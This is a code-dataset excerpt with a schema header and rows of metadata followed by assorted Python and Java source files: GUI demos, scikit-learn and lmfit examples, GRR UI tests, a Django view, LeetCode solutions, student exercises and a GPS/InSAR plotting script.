blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
288
content_id
stringlengths
40
40
detected_licenses
listlengths
0
112
license_type
stringclasses
2 values
repo_name
stringlengths
5
115
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
684 values
visit_date
timestamp[us]date
2015-08-06 10:31:46
2023-09-06 10:44:38
revision_date
timestamp[us]date
1970-01-01 02:38:32
2037-05-03 13:00:00
committer_date
timestamp[us]date
1970-01-01 02:38:32
2023-09-06 01:08:06
github_id
int64
4.92k
681M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
22 values
gha_event_created_at
timestamp[us]date
2012-06-04 01:52:49
2023-09-14 21:59:50
gha_created_at
timestamp[us]date
2008-05-22 07:58:19
2023-08-21 12:35:19
gha_language
stringclasses
147 values
src_encoding
stringclasses
25 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
128
12.7k
extension
stringclasses
142 values
content
stringlengths
128
8.19k
authors
listlengths
1
1
author_id
stringlengths
1
132
8332e30937e9e1b5e5122db696b4431f00c38374
6223dc2e5de7921696cb34fb62142fd4a4efe361
/.metadata/.plugins/org.eclipse.core.resources/.history/51/40e6c6177739001412b5c17ef71e72e3
6db0fb731998676d3ddb05dbce7d5249db6922c6
[]
no_license
Mushirahmed/python_workspace
5ef477b2688e8c25b1372f546752501ee53d93e5
46e2ed783b17450aba29e4e2df7b656522b2b03b
refs/heads/master
2021-03-12T19:24:50.598982
2015-05-25T10:23:54
2015-05-25T10:23:54
24,671,376
0
1
null
2015-02-06T09:27:40
2014-10-01T08:40:33
Python
UTF-8
Python
false
false
1,442
#!/usr/bin/env python import wx def slider(parent, min, max, callback): """ Return a wx.Slider object. @param min: minimum slider value @type min: float @param max: maximum slider value @type max: float @param callback: function of one arg invoked when slider moves. @rtype: wx.Slider """ new_id = wx.NewId() s = wx.Slider(parent, new_id, (max+min)/2, min, max, wx.DefaultPosition, wx.Size(250,-1), wx.SL_HORIZONTAL | wx.SL_LABELS) wx.EVT_COMMAND_SCROLL(parent, new_id, lambda evt : callback(evt.GetInt())) return s # ---------------------------------------------------------------- # Demo app # ---------------------------------------------------------------- if __name__ == '__main__': from gnuradio.wxgui import stdgui2 class demo_graph(stdgui.gui_flow_graph): def __init__(self, frame, panel, vbox, argv): stdgui.gui_flow_graph.__init__ (self, frame, panel, vbox, argv) vbox.Add(slider(panel, 23, 47, self.my_callback1), 1, wx.ALIGN_CENTER) vbox.Add(slider(panel, -100, 100, self.my_callback2), 1, wx.ALIGN_CENTER) def my_callback1(self, val): print "cb1 = ", val def my_callback2(self, val): print "cb2 = ", val def main (): app = stdgui.stdapp (demo_graph, "Slider Demo") app.MainLoop () main ()
532a4c353a1544432b498ed028eb0f65b6b9fc4d
e2860eb874db045fb8d0279566a935af907e5bdf
/ml/ml07_1_boston.py
b245a54bef04d78667e33b52f33e63088f0a8179
[]
no_license
MinseokCHAE/Bitcamp2_new
dda7990907cb136c2e709a345eec634dfdb6ac02
849adb5a330b621f1c681f0b5e92005d1281a44d
refs/heads/main
2023-08-31T03:28:18.068561
2021-10-05T00:48:52
2021-10-05T00:48:52
390,228,262
0
0
null
null
null
null
UTF-8
Python
false
false
1,847
py
import numpy as np import time from sklearn.metrics import r2_score from sklearn.model_selection import train_test_split from sklearn.preprocessing import MinMaxScaler, StandardScaler, RobustScaler, QuantileTransformer, OneHotEncoder from sklearn.datasets import load_boston from tensorflow.keras.models import Sequential, Model from tensorflow.keras.layers import Dense, Input, Conv1D, Flatten, MaxPooling1D, GlobalAveragePooling1D, Dropout from tensorflow.keras.callbacks import EarlyStopping from tensorflow.keras.utils import to_categorical #1. data preprocessing boston = load_boston() x = boston.data y = boston.target x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=21) scaler = MinMaxScaler() scaler.fit(x_train) x_train = scaler.transform(x_train) x_test = scaler.transform(x_test) from sklearn.model_selection import KFold, cross_val_score, GridSearchCV from sklearn.ensemble import RandomForestRegressor from sklearn.metrics import accuracy_score n_splits = 5 kfold = KFold(n_splits=n_splits, shuffle=True, random_state=21) parameter = [ {'n_estimators': [100,200]}, {'max_depth': [6, 8, 10, 12]}, {'min_samples_leaf': [3, 5, 7, 10]}, {'min_samples_split': [2, 3, 5, 10]}, {'n_jobs': [-1, 2, 4]} ] model = RandomForestRegressor() grid = GridSearchCV(model, parameter, cv=kfold) grid.fit(x_train, y_train) best_estimator = grid.best_estimator_ best_score = grid.best_score_ # y_pred = grid.predict(x_test) # acc_score = accuracy_score(y_test, y_pred) grid_score = grid.score(x_test, y_test) print('best parameter = ', best_estimator) print('best score = ', best_score) # print('acc score = ', acc_score) print('grid score = ', grid_score) # best parameter = RandomForestRegressor(min_samples_split=5) # best score = 0.830591307770115 # grid score = 0.8783616408326427
a161266ee413fb7f3bb8b94466c9d03314de7ee9
633b695a03e789f6aa644c7bec7280367a9252a8
/lmfit_gallery/documentation/fitting_withreport.py
412f4c07159b2a6fb06c2af10b0d239b29d68e3f
[]
no_license
tnakaicode/PlotGallery
3d831d3245a4a51e87f48bd2053b5ef82cf66b87
5c01e5d6e2425dbd17593cb5ecc973982f491732
refs/heads/master
2023-08-16T22:54:38.416509
2023-08-03T04:23:21
2023-08-03T04:23:21
238,610,688
5
2
null
null
null
null
UTF-8
Python
false
false
1,206
py
""" doc_fitting_withreport.py ========================= """ # <examples/doc_fitting_withreport.py> from numpy import exp, linspace, pi, random, sign, sin from lmfit import Parameters, fit_report, minimize p_true = Parameters() p_true.add('amp', value=14.0) p_true.add('period', value=5.46) p_true.add('shift', value=0.123) p_true.add('decay', value=0.032) def residual(pars, x, data=None): """Model a decaying sine wave and subtract data.""" vals = pars.valuesdict() amp = vals['amp'] per = vals['period'] shift = vals['shift'] decay = vals['decay'] if abs(shift) > pi/2: shift = shift - sign(shift)*pi model = amp * sin(shift + x/per) * exp(-x*x*decay*decay) if data is None: return model return model - data random.seed(0) x = linspace(0.0, 250., 1001) noise = random.normal(scale=0.7215, size=x.size) data = residual(p_true, x) + noise fit_params = Parameters() fit_params.add('amp', value=13.0) fit_params.add('period', value=2) fit_params.add('shift', value=0.0) fit_params.add('decay', value=0.02) out = minimize(residual, fit_params, args=(x,), kws={'data': data}) print(fit_report(out)) # <end examples/doc_fitting_withreport.py>
06683c64c9c082713d0b286d60bf3d006bef3569
6fcfb638fa725b6d21083ec54e3609fc1b287d9e
/python/NicolasHug_Surprise/Surprise-master/examples/grid_search_usage.py
f915af8c2eff0478eb4c7a991024a2a4e4aa1ff3
[]
no_license
LiuFang816/SALSTM_py_data
6db258e51858aeff14af38898fef715b46980ac1
d494b3041069d377d6a7a9c296a14334f2fa5acc
refs/heads/master
2022-12-25T06:39:52.222097
2019-12-12T08:49:07
2019-12-12T08:49:07
227,546,525
10
7
null
2022-12-19T02:53:01
2019-12-12T07:29:39
Python
UTF-8
Python
false
false
1,150
py
""" This module describes how to manually train and test an algorithm without using the evaluate() function. """ from __future__ import (absolute_import, division, print_function, unicode_literals) from surprise import GridSearch from surprise import SVD from surprise import Dataset param_grid = {'n_epochs': [5, 10], 'lr_all': [0.002, 0.005], 'reg_all': [0.4, 0.6]} grid_search = GridSearch(SVD, param_grid, measures=['RMSE', 'FCP']) # Prepare Data data = Dataset.load_builtin('ml-100k') data.split(n_folds=3) grid_search.evaluate(data) # best RMSE score print(grid_search.best_score['RMSE']) # >>> 0.96117566386 # combination of parameters that gave the best RMSE score print(grid_search.best_params['RMSE']) # >>> {'reg_all': 0.4, 'lr_all': 0.005, 'n_epochs': 10} # best FCP score print(grid_search.best_score['FCP']) # >>> 0.702279736531 # combination of parameters that gave the best FCP score print(grid_search.best_params['FCP']) # >>> {'reg_all': 0.6, 'lr_all': 0.005, 'n_epochs': 10} import pandas as pd # noqa results_df = pd.DataFrame.from_dict(grid_search.cv_results) print(results_df)
0359e9366c572e840e6a924176a959c6c328847d
e3c8f786d09e311d6ea1cab50edde040bf1ea988
/Incident-Response/Tools/grr/grr/server/grr_response_server/gui/selenium_tests/report_test.py
1175096622c718b20aa9b0c66c5f1c953997a6f7
[ "Apache-2.0", "MIT" ]
permissive
foss2cyber/Incident-Playbook
d1add8aec6e28a19e515754c6ce2e524d67f368e
a379a134c0c5af14df4ed2afa066c1626506b754
refs/heads/main
2023-06-07T09:16:27.876561
2021-07-07T03:48:54
2021-07-07T03:48:54
384,988,036
1
0
MIT
2021-07-11T15:45:31
2021-07-11T15:45:31
null
UTF-8
Python
false
false
4,588
py
#!/usr/bin/env python from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals from absl import app from selenium.webdriver.common import keys from grr_response_core.lib import rdfvalue from grr_response_server import data_store from grr_response_server.gui import gui_test_lib from grr_response_server.rdfvalues import objects as rdf_objects from grr.test_lib import test_lib def AddFakeAuditLog(user=None, router_method_name=None): data_store.REL_DB.WriteAPIAuditEntry( rdf_objects.APIAuditEntry( username=user, router_method_name=router_method_name, )) class TestReports(gui_test_lib.GRRSeleniumTest): """Test the reports interface.""" def testReports(self): """Test the reports interface.""" with test_lib.FakeTime( rdfvalue.RDFDatetime.FromHumanReadable("2012/12/14")): AddFakeAuditLog(user="User123") with test_lib.FakeTime( rdfvalue.RDFDatetime.FromHumanReadable("2012/12/22")): AddFakeAuditLog(user="User456") # Make "test" user an admin. self.CreateAdminUser(u"test") self.Open("/#/stats/") # Go to reports. self.Click("css=#MostActiveUsersReportPlugin_anchor i.jstree-icon") self.WaitUntil(self.IsTextPresent, "Server | User Breakdown") # Enter a timerange that only matches one of the two fake events. self.Type("css=grr-form-datetime input", "2012-12-21 12:34") self.Click("css=button:contains('Show report')") self.WaitUntil(self.IsTextPresent, "User456") self.assertFalse(self.IsTextPresent("User123")) def testReportsDontIncludeTimerangesInUrlsOfReportsThatDontUseThem(self): client_id = self.SetupClient(0) self.AddClientLabel(client_id, u"owner", u"bar") self.Open("/#/stats/") # Go to reports. self.Click("css=#MostActiveUsersReportPlugin_anchor i.jstree-icon") self.WaitUntil(self.IsTextPresent, "Server | User Breakdown") # Default values aren't shown in the url. self.WaitUntilNot(lambda: "start_time" in self.GetCurrentUrlPath()) self.assertNotIn("duration", self.GetCurrentUrlPath()) # Enter a timerange. self.Type("css=grr-form-datetime input", "2012-12-21 12:34") self.Type("css=grr-form-duration input", "2w") self.Click("css=button:contains('Show report')") # Reports that require timeranges include nondefault values in the url when # `Show report' has been clicked. self.WaitUntil(lambda: "start_time" in self.GetCurrentUrlPath()) self.assertIn("duration", self.GetCurrentUrlPath()) # Select a different report. self.Click("css=#LastActiveReportPlugin_anchor i.jstree-icon") self.WaitUntil(self.IsTextPresent, "Client | Last Active") # The default label isn't included in the url. self.WaitUntilNot(lambda: "bar" in self.GetCurrentUrlPath()) # Select a client label. self.Select("css=grr-report select", "bar") self.Click("css=button:contains('Show report')") # Reports that require labels include them in the url after `Show report' # has been clicked. self.WaitUntil(lambda: "bar" in self.GetCurrentUrlPath()) # Reports that dont require timeranges don't mention them in the url. self.assertNotIn("start_time", self.GetCurrentUrlPath()) self.assertNotIn("duration", self.GetCurrentUrlPath()) # Select a different report. self.Click("css=#GRRVersion7ReportPlugin_anchor i.jstree-icon") self.WaitUntil(self.IsTextPresent, "Active Clients - 7 Days Active") # The label is cleared when report type is changed. self.WaitUntilNot(lambda: "bar" in self.GetCurrentUrlPath()) self.assertNotIn("start_time", self.GetCurrentUrlPath()) self.assertNotIn("duration", self.GetCurrentUrlPath()) class TestDateTimeInput(gui_test_lib.GRRSeleniumTest): """Tests datetime-form-directive.""" def testInputAllowsInvalidText(self): # Make "test" user an admin. self.CreateAdminUser(u"test") # Open any page that shows the datetime-form-directive. self.Open("/#/stats/HuntApprovalsReportPlugin") datetime_input = self.WaitUntil(self.GetVisibleElement, "css=grr-form-datetime input") value = datetime_input.get_attribute("value") self.assertRegex(value, r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}") self.assertStartsWith(value, "20") datetime_input.send_keys(keys.Keys.BACKSPACE) self.WaitUntilNot(self.IsTextPresent, value) self.assertEqual(value[:-1], datetime_input.get_attribute("value")) if __name__ == "__main__": app.run(test_lib.main)
c8401e8e3188c1d22ddcee1a2d85035f8bdfab43
de0ea898d18e4faf383d230cf2542335bfa166d5
/library/views.py
877c529b48ed090292c6dd4c1e2631133c9a939e
[]
no_license
msadour/book_API
86121341e66249b51835e5e1c842c8fdde26ba6c
81477c242647c95897a05ad892bc3e11542defa7
refs/heads/master
2022-12-09T16:33:12.027427
2020-01-22T13:25:45
2020-01-22T13:25:45
231,387,598
0
0
null
2022-12-07T23:21:19
2020-01-02T13:28:36
HTML
UTF-8
Python
false
false
989
py
# -*- coding: utf-8 -*- """ Views. """ from __future__ import unicode_literals from rest_framework import viewsets from rest_framework import permissions from rest_framework.views import APIView from rest_framework.response import Response from rest_framework.permissions import IsAuthenticated from .permissions import IsOwnerOrReadOnly from .models import Book from .serializers import BookSerializer class HelloView(APIView): """ Display the message 'Hello World!' if the permission allows us. """ permission_classes = (IsAuthenticated,) def get(self, request): content = {'message': 'Hello, World!'} return Response(content) class BookViewSet(viewsets.ModelViewSet): """ Display book(s) if the permission allows us. """ queryset = Book.objects.all() serializer_class = BookSerializer permission_classes = [IsAuthenticated, permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]
6b59d53ff5dca12c2cf49ecda84be12a1c60a12c
a3644ed207867df4d78a04af39ac3e26f86f9012
/ibvp/language/symbolic/util.py
cf587104d319938fea973aba507443ccc906a896
[ "MIT" ]
permissive
ibvp/ibvp
006887be85a37ac4da51664d5fec9244c446cacd
c758b150cbd822bd17444499bea29c53b0606327
refs/heads/master
2022-05-07T02:17:46.232332
2022-03-20T19:34:13
2022-03-20T19:34:13
21,990,116
1
1
null
null
null
null
UTF-8
Python
false
false
2,418
py
from __future__ import division from __future__ import absolute_import from six.moves import range __copyright__ = "Copyright (C) 2010-2013 Andreas Kloeckner" __license__ = """ Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import numpy as np def pretty(expr): from ibvp.language.symbolic.mappers import PrettyStringifyMapper stringify_mapper = PrettyStringifyMapper() from pymbolic.mapper.stringifier import PREC_NONE result = stringify_mapper(expr, PREC_NONE) splitter = "="*75 + "\n" cse_strs = stringify_mapper.get_cse_strings() if cse_strs: result = "\n".join(cse_strs)+"\n"+splitter+result return result def join_fields(*args): from pytools.obj_array import make_obj_array, log_shape from pymbolic.geometric_algebra import MultiVector, bit_count res_list = [] for arg in args: if isinstance(arg, list): res_list.extend(arg) elif isinstance(arg, MultiVector): for grade in arg.all_grades(): for bits in range(2**arg.space.dimensions): if bit_count(bits) == grade: res_list.append(arg.data.get(bits, 0)) elif isinstance(arg, np.ndarray): if log_shape(arg) == (): res_list.append(arg) else: res_list.extend(arg.flat) else: res_list.append(arg) return make_obj_array(res_list)
d699aa415671a09c0d3cb6f790fbd8d199a1e504
7b6377050fba4d30f00e9fb5d56dfacb22d388e1
/numericalFunctions/ptwXY/Python/Test/UnitTesting/convolution/convolution.py
23e1f84ea78f302c6955c15e21ec6115a7eb5cc4
[ "BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference" ]
permissive
LLNL/fudge
0a4fe8e3a68b66d58e42d1f4d209ea3f713c6370
6ba80855ae47cb32c37f635d065b228fadb03412
refs/heads/master
2023-08-16T21:05:31.111098
2023-08-01T22:09:32
2023-08-01T22:09:32
203,678,373
21
4
NOASSERTION
2023-06-28T20:51:02
2019-08-21T23:22:20
Python
UTF-8
Python
false
false
3,194
py
# <<BEGIN-copyright>> # Copyright 2022, Lawrence Livermore National Security, LLC. # See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: BSD-3-Clause # <<END-copyright>> import os from numericalFunctions import pointwiseXY_C if( 'CHECKOPTIONS' in os.environ ) : options = os.environ['CHECKOPTIONS'].split( ) if( '-e' in options ) : print( __file__ ) CPATH = '../../../../Test/UnitTesting/convolution' os.system( 'cd %s; ./convolution -v > v' % CPATH ) f = open( os.path.join( CPATH, 'v' ) ) ls = f.readlines( ) f.close( ) line = 1 def getIntegerValue( name, ls ) : global line s = "# %s = " % name n = len( s ) if( ls[0][:n] != s ) : raise Exception( '%s: line at %s does not contain %s info: "%s"' % ( __file__, line, name, ls[0][:-1] ) ) value = int( ls[0].split( '=' )[1] ) line += 1 return( ls[1:], value ) def getDoubleValue( name, ls ) : global line s = "# %s = " % name n = len( s ) if( ls[0][:n] != s ) : raise Exception( '%s: line at %s does not contain %s info: "%s"' % ( __file__, line, name, ls[0][:-1] ) ) value = float( ls[0].split( '=' )[1] ) line += 1 return( ls[1:], value ) def compareValues( label, i, v1, v2 ) : sv1, sv2 = '%.12g' % v1, '%.12g' % v2 sv1, sv2 = '%.8g' % float( sv1 ), '%.8g' % float( sv2 ) if( sv1 != sv2 ) : print( '<%s> <%s>' % ( sv1, sv2 ) ) if( sv1 != sv2 ) : raise Exception( '%s: values %s %s diff by %g at %d for label = %s' % ( __file__, v1, v2, v2 - v1, i, label ) ) def getData( ls, accuracy ) : global line i = 0 for l in ls : if( l.strip( ) != '' ) : break i = i + 1 line += i ls = ls[i:] ls, length = getIntegerValue( 'length', ls ) data = [ list( map( float, ls[i].split( )[:2] ) ) for i in range( length ) ] data = pointwiseXY_C.pointwiseXY_C( data, initialSize = len( data ), overflowSize = 10, accuracy = accuracy ) line += length return( ls[length:], data ) def getDatas( ls ) : global line i = 0 for l in ls : if( l.strip( ) != '' ) : break i = i + 1 line += i ls = ls[i:] if( len( ls ) == 0 ) : return( ls ) if( ls[0][:9] == '# Area = ' ) : ls = ls[1:] if( len( ls ) == 0 ) : return( ls ) label, ls = ls[0], ls[1:] if( label[:10] != '# label = ' ) : raise Exception( '%s: invalid label = "%s"' % ( __file__, label[:-1] ) ) line += 1 label = label.split( '=' )[1].strip( ) ls, mode = getIntegerValue( 'mode', ls ) ls, accuracy = getDoubleValue( 'accuracy', ls ) ls, self = getData( ls, accuracy ) ls, other = getData( ls, accuracy ) ls, cConvolution = getData( ls, accuracy ) convolution = self.convolute( other, mode ) if( len( convolution ) != len( cConvolution ) ) : raise Exception( '%s: len( convolution ) = %d != len( cConvolution ) = %d for label "%s"' % ( __file__, len( convolution ), len( cConvolution ), label ) ) for i , dXY in enumerate( convolution ) : gXY = cConvolution[i] compareValues( label, i, dXY[0], gXY[0] ) compareValues( label, i, dXY[1], gXY[1] ) return( ls ) while( len( ls ) ) : ls = getDatas( ls )
87d8617072a506c92696bd2d28771c0581767428
cc578cec7c485e2c1060fd075ccc08eb18124345
/cs15211/FlattenNestedListIterator.py
a0f0bfde784f7bd127acc87b7ee70a319e0c47be
[ "Apache-2.0" ]
permissive
JulyKikuAkita/PythonPrac
18e36bfad934a6112f727b4906a5e4b784182354
0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c
refs/heads/master
2021-01-21T16:49:01.482561
2019-02-07T06:15:29
2019-02-07T06:15:29
91,907,704
1
1
Apache-2.0
2019-02-07T06:15:30
2017-05-20T18:12:53
Python
UTF-8
Python
false
false
5,253
py
__source__ = 'https://leetcode.com/problems/flatten-nested-list-iterator/' # https://github.com/kamyu104/LeetCode/blob/master/Python/flatten-nested-list-iterator.py # Time: O(n), n is the number of the integers. # Space: O(h), h is the depth of the nested lists. # # Description: Leetcode # 341. Flatten Nested List Iterator # # This is the interface that allows for creating nested lists. # You should not implement it, or speculate about its implementation # """ #class NestedInteger(object): # def isInteger(self): # """ # @return True if this NestedInteger holds a single integer, rather than a nested list. # :rtype bool # """ # # def getInteger(self): # """ # @return the single integer that this NestedInteger holds, if it holds a single integer # Return None if this NestedInteger holds a nested list # :rtype int # """ # # def getList(self): # """ # @return the nested list that this NestedInteger holds, if it holds a nested list # Return None if this NestedInteger holds a single integer # :rtype List[NestedInteger] # """ # Companies # Google Facebook Twitter # Related Topics # Stack Design # Similar Questions # Flatten 2D Vector Zigzag Iterator Mini Parser Array Nesting # import unittest class NestedIterator(object): def __init__(self, nestedList): """ Initialize your data structure here. :type nestedList: List[NestedInteger] """ self.__depth = [[nestedList, 0]] def next(self): """ :rtype: int """ nestedList, i = self.__depth[-1] self.__depth[-1][1] += 1 return nestedList[i].getInteger() def hasNext(self): """ :rtype: bool """ while self.__depth: nestedList, i = self.__depth[-1] if i == len(nestedList): self.__depth.pop() elif nestedList[i].isInteger(): return True else: self.__depth[-1][1] += 1 self.__depth.append([nestedList[i].getList(), 0]) return False # Your NestedIterator object will be instantiated and called as such: # i, v = NestedIterator(nestedList), [] # while i.hasNext(): v.append(i.next()) class TestMethods(unittest.TestCase): def test_Local(self): self.assertEqual(1, 1) if __name__ == '__main__': unittest.main() Java = ''' # Thought: /** * // This is the interface that allows for creating nested lists. * // You should not implement it, or speculate about its implementation * public interface NestedInteger { * * // @return true if this NestedInteger holds a single integer, rather than a nested list. * public boolean isInteger(); * * // @return the single integer that this NestedInteger holds, if it holds a single integer * // Return null if this NestedInteger holds a nested list * public Integer getInteger(); * * // @return the nested list that this NestedInteger holds, if it holds a nested list * // Return null if this NestedInteger holds a single integer * public List<NestedInteger> getList(); * } */ # 3ms 94.48% public class NestedIterator implements Iterator<Integer> { private Stack<Iterator<NestedInteger>> stack; Integer nextInteger; public NestedIterator(List<NestedInteger> nestedList) { stack = new Stack<>(); if(nestedList != null){ stack.push(nestedList.iterator()); } } @Override public Integer next() { return nextInteger; } @Override public boolean hasNext() { while(!stack.isEmpty()){ Iterator<NestedInteger> iter = stack.peek(); if(!iter.hasNext()){ stack.pop(); continue; } NestedInteger nextVal = iter.next(); if(nextVal.isInteger()){ nextInteger = nextVal.getInteger(); return true; }else{ stack.push(nextVal.getList().iterator()); } } return false; } } /** * Your NestedIterator object will be instantiated and called as such: * NestedIterator i = new NestedIterator(nestedList); * while (i.hasNext()) v[f()] = i.next(); */ # 2ms 100% class NestedIterator implements Iterator<Integer> { List<NestedInteger> nestedList; List<Integer> list = new ArrayList<Integer>(); int index; private void help(List<NestedInteger> input){ // List<Integer> res = new ArrayList<Integer>(); for(NestedInteger item : input){ if(item.isInteger()){ list.add(item.getInteger()); }else{ help(item.getList()); } } // System.out.println(res.toString()); // return res; } public NestedIterator(List<NestedInteger> nestedList) { this.nestedList = nestedList; index = 0; help(nestedList); } @Override public Integer next() { return list.get(index++); } @Override public boolean hasNext() { if(index < list.size()){ return true; } return false; } } '''
904ddc6a110c928eecd9ed053afa3bf80f4931a3
de24f83a5e3768a2638ebcf13cbe717e75740168
/moodledata/vpl_data/25/usersdata/98/11884/submittedfiles/av1_3.py
e38e0f0784c64456ff7dcadb762460593411b8a4
[]
no_license
rafaelperazzo/programacao-web
95643423a35c44613b0f64bed05bd34780fe2436
170dd5440afb9ee68a973f3de13a99aa4c735d79
refs/heads/master
2021-01-12T14:06:25.773146
2017-12-22T16:05:45
2017-12-22T16:05:45
69,566,344
0
0
null
null
null
null
UTF-8
Python
false
false
274
py
# -*- coding: utf-8 -*- from __future__ import division import math a=int(input('Digite o valor de a: ')) b=int(input('Digite o valor de b: ')) i=1 cont=0 c=0 while True: if a%i==0 and b%i==0: cont=cont+1 c=i i=i+1 if i==a or i==b: break
961a831640d66bdb4e7113ccbc8e41fd17b88923
a61263850fe63de61ec3004519f0d9aa69f104ac
/python_Algorithm/battle19/TaxiFee.py
e10f3b4d5de684c4e63460e0d62861c606b5a984
[]
no_license
Kimhyeonsuk/Programmers_Python
dd0e13ef6690cfab0c46a7c8b07a5f3b40175071
cc5687c8db2cfa098602829dec3acbf17c5c2177
refs/heads/master
2023-07-16T22:30:29.457419
2021-09-02T10:40:56
2021-09-02T10:40:56
355,876,212
0
0
null
null
null
null
UTF-8
Python
false
false
607
py
def solution(n, s, a, b, fares): answer = 1e9 board = [[1e9 for _ in range(n + 1)] for _ in range(n + 1)] for fare in fares: board[fare[0]][fare[1]] = fare[2] board[fare[1]][fare[0]] = fare[2] for i in range(1, n + 1): board[i][i] = 0 for k in range(1, n + 1): for i in range(1, n + 1): for j in range(1, n + 1): if board[i][j]>board[i][k]+board[k][j]: board[i][j]=board[i][k]+board[k][j] for k in range(1, n + 1): answer = min(answer, board[s][k] + board[k][a] + board[k][b]) return answer
e50e19db7754f252118d5e3c69541abe67d0fdab
de24f83a5e3768a2638ebcf13cbe717e75740168
/moodledata/vpl_data/42/usersdata/69/21660/submittedfiles/jain.py
34c02d431af79001b4eb9414ce0115cad59ff0fc
[]
no_license
rafaelperazzo/programacao-web
95643423a35c44613b0f64bed05bd34780fe2436
170dd5440afb9ee68a973f3de13a99aa4c735d79
refs/heads/master
2021-01-12T14:06:25.773146
2017-12-22T16:05:45
2017-12-22T16:05:45
69,566,344
0
0
null
null
null
null
UTF-8
Python
false
false
1,090
py
# -*- coding: utf-8 -*- from __future__ import division import funcoes ''' ENTRADA TESTE f = 0.2 dH = 5 L = 3250 Q = 0.005 g = 9.81 v = 0.000001 e = 0.00006 k = 10 A saida para esta entrada é aproximadamente: 0.1247 (D) e 0.0224 (f) ''' f = 0.2 dH = input('Digite a perda de carga: ') L = input('Digite o comprimento da tubulação: ') Q = input('Digite a vazão: ') g = input('Digite a gravidade: ') v = input('Digite a viscosidade cinemática: ') e = input('Digite a rugosidade absoluta: ') k = 10 #comece aqui import math def diametro(fn,L,Q,dH): Diam=((8*fn*L*Q*Q)/(math.pi*math.pi*dH*g))**(1/5) return Diam def Reynalds(Q,D,v): R=4*Q/(math.pi*D*v) return R def atrito(Rey,E,D): s=(E/(3.7*D))+(5.74/(Rey**0.9)) t=(2500/Rey)**6 f=(((64/Rey)**8)+9.5*((math.log(s)-t)**(-16)))**0.125 return f for i in range(0,k,1): D=diametro(fn,L,Q,dH) Rey=Reynalds(Q,D,v) fn=atrito(Rey,e,D) if 0.000001<=(e/D)<=0.01 and 5000<=Rey<=100000000: if fn==f: break else: f=fn print('%.10f'%f) print('%.10f'%D)
3b12aa23f81a807198b89b5e8f7d0a2eec9c9ecd
1419418226b6ba0f510649daaf62b71554cc2284
/amatrice/project_GPS_M5.3_M5.8.py
5aabd4ea3ee678dc37aff80268eb4ebefda90005
[]
no_license
shineusn/mylife
2ef48a777e39be2ef746c3dad16ea963d5b23e5e
61dfa72d9047551746d26b7fe01fb5c2f1f0657a
refs/heads/master
2020-03-22T13:44:42.422127
2018-02-13T18:09:43
2018-02-13T18:09:43
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,896
py
from matplotlib import pyplot as plt from numpy import genfromtxt,argmin,array,zeros,ones,where,linspace,r_ from matplotlib.ticker import MultipleLocator g=genfromtxt('/Users/dmelgar/Amatrice2016/GPS/Cosismico_26Oct2016_GPS_GdL_V1.dat') insar=genfromtxt(u'/Users/dmelgar/Amatrice2016/InSAR/M5.3-M5.8/Italy_T44/T44_Italy.lltnde') #Parse GPS lon_gps=g[:,1] lat_gps=g[:,2] north=g[:,6]/1000 east=g[:,4]/1000 up=g[:,8]/1000 #parse insar lon_insar=insar[:,0] lat_insar=insar[:,1] los=insar[:,6]/1000 lookE=insar[:,3] lookN=insar[:,4] lookU=insar[:,5] #Projection variables projected_gps=9999*ones(len(lon_gps)) los_insar=9999*ones(len(lon_gps)) thresh=0.005 for k in range(len(lon_gps)): #Get distance from GPS to LOS points d=((lon_gps[k]-lon_insar)**2+(lat_gps[k]-lat_insar)**2)**0.5 i=argmin(d) if d[i]<thresh: #Get los vector unit_vector=array([lookE[i],lookN[i],lookU[i]]) #project projected_gps[k]=unit_vector.dot(array([east[k],north[k],up[k]])) los_insar[k]=los[i] plt.figure(figsize=(6,10)) plt.subplot(211) plt.quiver(r_[11.65,lon_gps],r_[43.72,lat_gps],r_[1,east],r_[0,north],scale=0.11) #i=where(up<0)[0] #j=where(up>=0)[0] #plt.quiver(lon_gps[j],lat_gps[j],zeros(len(up[j])),up[j],scale=0.01,color='b') #plt.quiver(lon_gps[i],lat_gps[i],zeros(len(up[i])),up[i],scale=0.01,color='r') ax=plt.subplot(212) i=where(projected_gps<9999)[0] x=linspace(-0.02,0.02) y=x plt.plot(x,y,lw=2,c='k') plt.scatter(projected_gps[i],los_insar[i],marker='s',s=30,lw=0.2,c='#0080FF') plt.xlim([-0.02,0.02]) plt.ylim([-0.02,0.02]) xmajorLocator = MultipleLocator(0.01) ymajorLocator = MultipleLocator(0.01) ax.xaxis.set_major_locator(xmajorLocator) ax.yaxis.set_major_locator(ymajorLocator) plt.ylabel('InSAR LOS (m)') plt.xlabel('Projected GPS (m)') plt.subplots_adjust(left=0.2,right=0.97,top=0.99,bottom=0.1)
a861a51696a1ce07f9eff6c8bb1d0344e618b511
3cadf60273e5e7ecede807d631d2c9b9e45499ad
/src/18_stuff/task02.py
d28f964b1cb2678dc24838eebe40832c175a7700
[]
no_license
shamanengine/HackerRank
78a4316713518601f4f0499626fbce8766e004df
